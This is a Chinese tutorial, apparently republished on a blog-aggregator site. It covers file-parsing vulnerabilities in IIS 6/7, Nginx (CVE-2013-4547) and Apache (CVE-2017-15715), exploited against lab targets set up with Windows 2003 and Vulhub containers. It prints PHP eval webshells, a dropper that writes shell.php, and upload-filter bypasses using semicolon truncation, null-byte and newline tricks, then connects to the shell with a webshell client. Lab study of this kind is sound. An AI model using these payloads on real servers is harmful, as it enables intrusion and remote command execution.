中间件解析漏洞(附环境搭建教程)

news2024/12/23 11:18:39

⼀:IIS解析漏洞

环境资源:

https://download.csdn.net/download/Nai_zui_jiang/89717504

环境安装

windows2003+iis6
1.创建新的虚拟机
2.在下⼀步中选择我们的iso⽂件镜像 vm已主动识别到windows2003
3.产品密钥⽹上搜⼀个 密码自己设置一个简单的,这里我用的是root
4.后⾯⼀直下⼀步 ⾃动安装
5.等待⼏分钟即可安装成功
6.接下来安装iis 控制⾯板--添加或删除程序---添加/删除windows组件
7.安装完成后web服务扩展全部打开
8.⽹站路径默认为 c:/inetpub/wwwroot

1.1:IIS6.X

⽬录解析

在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件
2.在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。
在外部浏览器访问虚拟机 iis⽹站中的1.jpg 发现asp代码被执⾏
将1.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏

畸形⽂件解析

        在IIS 6 处理⽂件解析时, 分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是 shell.asp。另外IIS6.0默认的可执⾏⽂件除了asp还包含 asa\cer\cdx

1.2:IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg
后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件

利⽤条件:

1. php.ini⾥的cgi.fix_pathinfo=1 开启
2. IIS7在Fast-CGI运⾏模式下

环境配置

在本机安装IIS后在安装PHPstudy for IIS
步骤⼆:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启....

步骤三:IIS -> 配置⽹站 -> 处理程序映射 -> PHPStudy_FastCGI -> 请求限制 ->取消勾选

利用姿势

直接进行访问不会进行php解析

在url后面加上 .php 后jpg内的php语句被解析出来

GetShell

步骤⼀:将PHP⼀句话⽊⻢写到shell.php并更改后缀为shell.jpg上传到⽬标站点...利⽤解析漏洞进⾏访问
http://localhost/shell.jpg/.php
然后复制url使用菜刀进行连接

⼆:Nginx解析漏洞

2.1:nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开 启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /x x.jpg/xx.php 解析为 php ⽂件。

利用条件

Nginx <=0.8.37
cgi.fix_pathinfo=1

利用姿势

Nginx的⽂件解析漏洞...和IIS7.0的解析漏洞同样的原理,因为 cgi.fix_pathinfo=1 造成的解析漏洞
同样使⽤ 1.jpg/.php ⽅式进⾏绕过
步骤⼀:进⼊以下Vulhub路径并开启容器
cd /nginx/nginx_parsing_vulnerability
docker-compose build
docker-compose up -d
docker ps -a
步骤⼆:浏览器中访问⽹站
步骤三:制作图⽚⻢并进⾏上传...获取上传⽂件地址
步骤四:访问以下路径,利⽤Nginx解析漏洞

2.2:CVE-2013-4547

此漏洞为⽂件名逻辑漏洞,该漏洞在上传图⽚时,修改其16进制编码可使其绕过策略,导致解析为
php。 当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。

影响版本

Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

利⽤姿势

步骤⼀:使⽤以下命令启动靶机并通过浏览器访问靶场⻚⾯
# 启动靶场
cd vulhub-master/nginx/CVE-2013-4547x // 切换到靶机⽬录
docker-compose build // 创建环境
docker-compose up -d // 打开环境
# 靶场⻚⾯
http://172.16.1.30:8080/
#shell.php
<?php @eval($_POST['cmd']);?>

步骤⼆:直接上传 shell.php 被拦截...修改⽂件后缀为.jpg进⾏上传且在后⾯添加空格;上传成功

步骤三:在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的
0x20 0x20 修改为如下即 0x20 0x00 进⾏发包
步骤四:访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 为 0x20 0x00
http://172.16.1.30:8080/uploadfiles/shell.jpg .php
由于⽊⻢地址编码问题,⼯具连不到 可以使⽤以下的php代码输出⼀句话⽊⻢到当前⽬录
<?php fputs(fopen( "shell.php","w" ), '<?php eval($_POST["cmd"]);?>' )?>

三:Apache解析漏洞

在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析, 就再往左判断。如 1.php.xxxxx

3.1:apache_parsing

漏洞原理

Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。⽐如如下配置⽂件

AddType text/html .html
AddLanguage zh-CN .cn
其给 .html 后缀增加了 media-type ,值为 text/html ;给 .cn 后缀增加了语⾔,值为 zh-C N 。此时,如果⽤户请求⽂件 index.cn.html ,他将返回⼀个中⽂的html⻚⾯。以上就是Apache多 后缀的特性。如果运维⼈员给 .php 后缀增加了处理器
AddHandler application/x-httpd-php .php
那么,在有多个后缀的情况下,只要⼀个⽂件含有 .php 后缀的⽂件即将被识别成PHP⽂件,没必要是最后⼀个后缀。利⽤这个特性,将会造成⼀个可以绕过上传⽩名单的解析漏洞

利⽤姿势

步骤⼀:进⼊Vulhub靶场并执⾏以下命令启动靶场
cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a

步骤⼆:访问靶机并上传 shell.php.jpg ⽂件,⽂件内容为

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

 步骤三:上传成功后与⽹站进⾏路径拼接...如下

http://172.16.1.30/uploadfiles/shell.php.jpg

 步骤四:访问⽣成的shell.php并执⾏命令,执⾏成功。

3.2:CVE-2017-15715

Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器安全策略。

影响版本

2.4.0~2.4.29

利⽤姿势

进⼊Vulhub靶场并开启⽬标靶机

cd/Vulnhub/httpd/CVE-2017-15715

docker-compose up -d
尝试发送一句话木马发现被拦截
在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功
访问上传的evil⽂件在后⾯加上 %0a 再访问发现解析了其中的PHP代码,但后缀不是php说明
存在解析漏洞
http://172.16.1.30:8080/evil.php%0a

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2108804.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Depop被封如何恢复?如何申诉?可以解封吗?

Depop 是一个受欢迎的在线市场&#xff0c;帮助用户在全球范围内买卖服装、时尚物品和其他配饰。然而&#xff0c;与其他在线平台一样&#xff0c;Depop 有每个用户必须遵守的准则和规则&#xff0c;以确保市场安全公平。其中一条规则是&#xff0c;您不得拥有多个帐户&#xf…

Docker核心原理解读:深度剖析Docker Daemon,掌控容器背后的引擎

容器技术已经成为现代应用程序开发和部署中的核心工具&#xff0c;而在Docker生态系统中&#xff0c;Docker Daemon 扮演着至关重要的角色。它不仅是Docker架构的核心&#xff0c;还负责容器的管理、镜像的操作、资源的分配等复杂任务。本文将深入解读Docker Daemon的工作原理&…

【2024高教社杯全国大学生数学建模竞赛】ABCDEF题 问题分析、模型建立、参考文献及实现代码

【2024高教社杯全国大学生数学建模竞赛】ABCDEF题 问题分析、模型建立、参考文献及实现代码 1 比赛时间 北京时间&#xff1a;2024年9月5日 18:00-2024年9月8日20:00 2 思路内容 2.1 往届比赛资料 【2022高教社杯数学建模】C题&#xff1a;古代玻璃制品的成分分析与鉴别方案…

导入word模板的数据到DB,偏自学,可自改套用

GetMapping("/importTestPeople")public void importTestPeople(RequestParam("file") MultipartFile multipartFile) throws IOException {InputStream inputStream null;File file null;try {// 创建临时文件file File.createTempFile("temp&quo…

【2024数模国赛赛题思路公开】国赛C题第二套思路丨附可运行代码丨无偿自提

2024年国赛C题第二套解题思路 第一问&#xff1a;2024~2030年农作物的最优种植方案 【问题分析】 题目要求为某乡村在2024~2030年制定农作物的最优种植方案&#xff0c;目的是最大化收益&#xff0c;并需考虑两种销售情况&#xff1a; 1. 超过预期销售量的部分滞销&#xff0…

首席数据官职位设置流程解析

首席数据官专业能力验证&#xff08;CDO Professional Competency Certification&#xff09;旨在评估并验证那些精通国内外数据安全合规政策、擅长构建数据安全体系以及熟练掌握数据安全管理流程与技术防护手段的专业人士的能力。 为加强数据安全领域的人才队伍建设&#xff…

【网络安全】服务基础第一阶段——第七节:Windows系统管理基础---- Web与FTP服务器

将某台计算机中的⽂件通过⽹络传送到可能相距很远的另⼀台计算机中&#xff0c;是⼀项基本的⽹络应⽤&#xff0c;即⽂件传送。 ⽂件传送协议FTP &#xff08;File Transfer Protocol&#xff09;是因特⽹上使⽤得最⼴泛的⽂件传送协议。 涉及到文件的上传和下载&#xff0c;很…

2024 RustChinaConf 赞助商介绍

2024 RustChinaConf 得到了行业各界的广泛支持&#xff0c;在此向以下赞助商表示感谢&#xff01; 非凸科技 非凸科技是一家全栈使用Rust的金融科技公司&#xff0c;致力于为券商、私募、公募等金融机构及个人投资者提供一站式数智交易领域服务解决方案。作为本次大会的钻石赞助…

常见概念 -- 色度色散与偏振模色散

色度色散(CD) 由于光纤中不同波长对应不同的传输速度&#xff0c;不同波长到达相同距离的光纤的时间不同&#xff0c;从而导致光脉冲展宽。 偏振模色散(PMD) 由于光纤的随机性双折射&#xff0c;不同相位状态的光传播速度不同&#xff0c;使光脉冲展宽。 色散对系统的影响 C…

【办公效率】Axure会议室预订小程序原型图,含PRD需求文档和竞品分析

作品说明 作品页数&#xff1a;共50页 兼容版本&#xff1a;Axure RP 8/9/10 应用领域&#xff1a;中小型企业的会议室在线预订 作品申明&#xff1a;页面内容仅用于功能演示&#xff0c;无实际功能 作品特色 本作品为会议室预订小程序原型图&#xff0c;定位于拥有中大型…

太速科技-VC709E 基于FMC接口的Virtex7 XC7VX690T PCIeX8 接口卡

VC709E 基于FMC接口的Virtex7 XC7VX690T PCIeX8 接口卡 一、板卡概述 本板卡基于Xilinx公司的FPGA XC7VX690T-FFG1761 芯片&#xff0c;支持PCIeX8、两组 64bit DDR3容量8GByte&#xff0c;HPC的FMC连接器&#xff0c;板卡支持各种FMC子卡扩展。软件支持windows&#xf…

提升效率!ArcGIS中创建脚本工具

在我们日常使用的ArcGIS中已经自带了很多功能强大的工具&#xff0c;但有时候遇到个人的特殊情况还是无法满足&#xff0c;这时就可以试着创建自定义脚本工具。 一、编写代码 此处的代码就是一个很简单的给图层更改别名的代码。 1. import arcpy 2. input_fc arcpy.GetParam…

3、无重复字符的最长子串

题目 链接&#xff1a;leetcode链接 思路分析&#xff08;滑动窗口&#xff09; 子串是连续的&#xff0c;很容易联想到滑动窗口&#xff0c;处理连续子串问题很方便。 先设置left和right两个指针&#xff0c;从0位置开始移动。 为了去判断窗口里面有没有出现重复的子串&a…

matplotlib可视化学习

单折线图&#xff1a;显示变量随时间变化而发生的变化&#xff0c;也可以增加标签 多折线图&#xff0c;对比差异 散点图&#xff1a;体现数据在一定范围内的分布情况 box箱图&#xff1a;体现数据的分布情况&#xff0c;与散点图不同的是&#xff0c;它还统计了最大/最小值、中…

基于C+++CSV文件存储开发图书管理系统

简介 这是一个简单的拥有图形界面的图书管理系统。 特色 前后端完全分离易于使用的交互界面 功能介绍 主要有图书管理和用户管理两项功能。 默认读取同一目录下的 user.csv 和 book.csv 作为用户和图书数据文件。也可在登录后导入其他数据文件。 在无数据文件的情况下&am…

2024年6月第2套英语四级真题PDF

2024年6月第2套英语四级真题PDF

python 统计文件夹中图片尺寸

python Code import os import matplotlib.pyplot as plt import numpy as np import copy import shutil import cv2 import matplotlib.pyplot as plt def cv_imread(file_path):#imdedcode读取的是RGB图像cv_img cv2.imdecode(np.fromfile(file_path,dtypenp.uint8),-1)re…

基于STM32的RTOS--freertos的使用(HAL实现多任务)

一&#xff1a;STM32cubemx配置 1&#xff1a;工程建立 &#xff08;1&#xff09;打开stm32cubemx 点击进入芯片选择页面 &#xff08;2&#xff09;选择对应的芯片型号双击 2&#xff1a;调试接口配置 3&#xff1a;时钟设置 使用的开发板没有外部晶振不选择外部使用内部设置…

MacOS---IDEA快捷键:生成get/set方法

介绍 在苹果电脑使用快捷键快速生成get/set方法。 快捷键 Cmdn

【大规模语言模型:从理论到实践】Transformer中PositionalEncoder详解

书籍链接&#xff1a;大规模语言模型&#xff1a;从理论到实践 第15页位置表示层代码详解 1. 构造函数 __init__() def __init__(self, d_model, max_seq_len80):super().__init__()self.d_model d_model # 嵌入的维度&#xff08;embedding dimension&#xff09;d_mode…